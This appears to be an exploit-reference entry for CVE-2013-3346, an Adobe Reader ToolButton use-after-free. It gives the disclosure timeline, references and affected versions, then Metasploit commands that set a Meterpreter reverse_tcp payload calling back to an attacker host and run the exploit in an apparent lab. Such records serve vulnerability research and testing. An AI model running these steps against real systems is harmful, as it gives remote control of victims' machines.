Timeline :

Vulnerability discovered by Soroush Dalili and reported to ZDI
Vulnerability reported to the vendor by ZDI the 2013-09-11
Patched by the vendor via APSB13-15 the 2013-08-03
Coordinated public release of advisory by ZDI the 2013-09-11
Vulnerability exploited in the wild in combination with another vulnerability the 2013-11-27
Metasploit PoC provided the 2013-12-16

PoC provided by :

Soroush Dalili
Unknown
sinn3r
juan vazquez

Reference(s) :

CVE-2013-3346
OSVDB-96745
ZDI-13-212
APSB13-15

Affected version(s) :

Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior.

Tested onĀ :

with Adobe Reader 11.0.2 on Windows XP SP3

Description :

This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback can be used to early free the object memory. Later use of the object allows triggering the use after free condition. This module has been tested successfully on Adobe Reader 11.0.2 and 10.0.4, with IE and Windows XP SP3, as exploited in the wild in November, 2013. At the moment, this module doesn’t support Adobe Reader 9 targets; in order to exploit Adobe Reader 9 the fileformat version of the exploit can be used. This exploit also exist in File format exploit/windows/fileformat/adobe_toolbutton

Commands :

use exploit/windows/browser/adobe_toolbutton
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo